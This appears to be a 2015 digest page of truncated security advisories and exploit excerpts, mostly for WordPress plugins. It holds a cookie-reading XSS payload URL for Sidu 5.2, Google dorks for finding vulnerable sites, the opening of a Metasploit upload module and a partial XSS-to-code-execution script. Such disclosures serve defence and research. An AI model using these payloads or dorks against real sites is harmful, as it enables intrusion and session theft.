Sidu 5.2 Admin XSS Vulnerability

15 May 2015 - Source: http://www.mondounix.com
Affected Vendor:
www.topnew.net/sidu/
 
Credits: John Page ( hyp3rlinx )
Domains:  hyp3rlinx.altervista.org
 
Source:
http://hyp3rlinx.altervista.org/advisories/AS-SIDU0513.txt
 
Product:
Sidu version 5.2 is a web based database front-end administration tool.
 
Advisory Information:
=====================================================
Sidu 5.2 is vulnerable to cross site scripting attacks.
 
Exploit code:
==============
 
http://localhost/sidu52/sql.php?id=1&sql=%27%27%3Cscript%3Ealert%28%22XSS%20By%20hyp3rlinx%20\n05112015\n%22%2bdocument.cookie%29%3C/script%3E
 
Disclosure Timeline:
==================================
 
Vendor Notification: May 12, 2015
Public Disclosure: May 13, 2015
 
Severity...


WordPress RevSlider 3.0.95 File Upload / Execute

15 May 2015 - Source: http://www.mondounix.com
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::HTTP::Wordpress
  include Msf::Exploit::FileDropper
 
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Wordpress RevSlider File Upload and Execute Vulnerability',
      'Description'    => %q{
        This module exploits an arbitrary PHP code upload in the WordPress ThemePunch
        Revolution Slider ( revslider ) plugin, version 3.0.95 and prior. The
        vulnerability allows for arbitrary file upload and remote code execution.
...


WordPress Ultimate Product Catalogue 3.1.2 SQL Injection

15 May 2015 - Source: http://www.mondounix.com
--------
ISSUE 1:
 
# Exploit Title: Unauthenticated SQLi in Item_ID POST parameter on Ultimate Product Catalogue wordpress plugin
# Google Dork: inurl:"SingleProduct" intext:"Back to catalogue"
intext:"Category",
inurl:"/wp-content/plugins/ultimate-product-catalogue/product-sheets/"
# Date: 22/04/2015
# Exploit Author: Felipe Molina de la Torre (@felmoltor)
# Vendor Homepage: https://wordpress.org/plugins/ultimate-product-catalogue/
# Software Link: https://downloads.wordpress.org/plugin/ultimate-product-catalogue.3.1.2.zip
# Version: <= 3.1.2, Communicated and Fixed by the Vendor in 3.1.3
# Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache 2.4.0 (Ubuntu)
# CVE...


WordPress Freshmail 1.5.8 SQL Injection

15 May 2015 - Source: http://www.mondounix.com
------------------------
ISSUE 1:
 
 
# Exploit Title: Unauthenticated SQL Injection on Wordpress Freshmail (#1)
# Google Dork: N/A
# Date: 05/05/2015
# Exploit Author: Felipe Molina de la Torre (@felmoltor)
# Vendor Homepage: http://freshmail.com/
# Software Link: https://downloads.wordpress.org/plugin/freshmail-newsletter.latest-stable.zip
# Version: <= 1.5.8, Communicated and Fixed by the Vendor in 1.6
# Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache 2.4.0 (Ubuntu)
# CVE : N/A
# Category: webapps
 
1. Summary
------------------
 
Freshmail plugin is an email...


Venom, a new 0-day makes servers tremble

14 May 2015 - Source: http://www.chimerarevo.com

VPS (Virtual Private Server) and shared hosting solutions are among the most popular choices for anyone looking for a good compromise between quality and price, and both have one thing in common: the real, physical server runs several operating systems in parallel on the same hardware thanks to a sophisticated mechanism governed for the most part by a piece of software called a “hypervisor”. As a rule, all the operating systems on the physical server, while remaining separate entities, share its resources.

...


WordPress Ad Inserter 1.5.2 CSRF / XSS

9 May 2015 - Source: http://www.mondounix.com
================================================================
CSRF/Stored XSS Vulnerability in Ad Inserter Plugin 
================================================================
 
 
.. contents:: Table Of Content
 
Overview
========
 
* Title :CSRF and Stored XSS Vulnerability in Ad Inserter Wordpress Plugin 
* Author: Kaustubh G. Padwad
* Plugin Homepage: https://wordpress.org/plugins/ad-inserter/
* Severity: HIGH
* Version Affected: Version  1.5.2  and mostly prior to it
* Version Tested : Version  1.5.2
* version patched:
 
Description 
===========
 
Vulnerable Parameter 
--------------------
* ad1_name
* Block 1
* Block Name
* adinserter name
* disable adinserter 
 
 
About...


WordPress Embed-Articles 7.0.3 CSRF / XSS

9 May 2015 - Source: http://www.mondounix.com
======================================================
CSRF/Stored XSS Vulnerability in embed articles Plugin
======================================================
 
 
.. contents:: Table Of Content
 
Overview
========
 
* Title :CSRF and Stored XSS Vulnerability in embed-articles Wordpress Plugin 
* Author: Kaustubh G. Padwad
* Plugin Homepage: https://wordpress.org/plugins/embed-articles/
* Severity: HIGH
* Version Affected: Version 7.0.3 and mostly prior to it
* Version Tested : Version 7.0.3
* version patched:
 
Description 
===========
 
Vulnerable Parameter 
--------------------
 
* API Key
 
About Vulnerability
-------------------
This plugin is vulnerable to a combination of...


WordPress Akismet 3.1.1 Cross Site Scripting

9 May 2015 - Source: http://www.mondounix.com
# Exploit Title: Wordpress Akismet 3.1.1 Plugin - XSS Vulnerability
# Google Dork: inurl:/wp-content/plugins/akismet/akismet.php
# Date: 2014-12-29
# Exploit Author: Ehsan Ice
# Software Link: https://akismet.com/ , https://wordpress.org/plugins/akismet/developers/
# Download Link: https://downloads.wordpress.org/plugin/akismet.3.1.1.zip
# Version : 3.1.1
# Tested on: Kali , Windows
# CVE : N/A
 
 XSS Vulnerability
 http://site/wp-content/plugins/akismet/akismet.php
 http://site/wp-content/plugins/akismet/class.akismet-admin.php
 
  Userinput reaches sensitive sink when function add_comment_author_url()
is called.
 
428: print print (wp_update_comment($comment));  // class.akismet-admin.php
426: $comment['comment_author_url']...


WordPress 4.2.1 XSS / Code Execution

9 May 2015 - Source: http://www.mondounix.com
/*
Author: @Evex_1337
Title: Wordpress XSS to RCE
Description: This Exploit Uses XSS Vulnerabilities in Wordpress
Plugins/Themes/Core To End Up Executing Code After Being Triggered With
Administrator Privileged User. ¯\_(ツ)_/¯
Reference: http://research.evex.pw/?vuln=14
Enjoy.
 
*/
//Installed Plugins Page
plugins = (window.location['href'].indexOf('/wp-admin/') != - 1) ?
'plugins.php' : 'wp-admin/plugins.php';
//Inject "XSS" Div
jQuery('body').append('<div id="xss" ></div>');
xss_div = jQuery('#xss');
xss_div.hide();
//Get Installed Plugins Page Source and Append it to "XSS" Div
jQuery.ajax({
  url: plugins,
  type: 'GET',
  async: false,
  cache: false,
  timeout:...


WordPress Ultimate Product Catalogue 3.1.2 XSS / CSRF / File Upload

9 May 2015 - Source: http://www.mondounix.com
# Exploit Title: Multiple Persistent XSS & CSRF & File Upload on Ultimate Product Catalogue 3.1.2
# Google Dork: inurl:"SingleProduct" intext:"Back to catalogue"
intext:"Category",
inurl:"/wp-content/plugins/ultimate-product-catalogue/product-sheets/"
# Date: 22/04/2015
# Exploit Author: Felipe Molina de la Torre (@felmoltor)
# Vendor Homepage: https://wordpress.org/plugins/ultimate-product-catalogue/
# Software Link: https://downloads.wordpress.org/plugin/ultimate-product-catalogue.3.1.2.zip
# Version: <= 3.1.2, Communicated and Fixed by the Vendor in 3.1.5
# Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache 2.4.0 (Ubuntu)
# CVE : N/A
# Category: webapps
 
1....
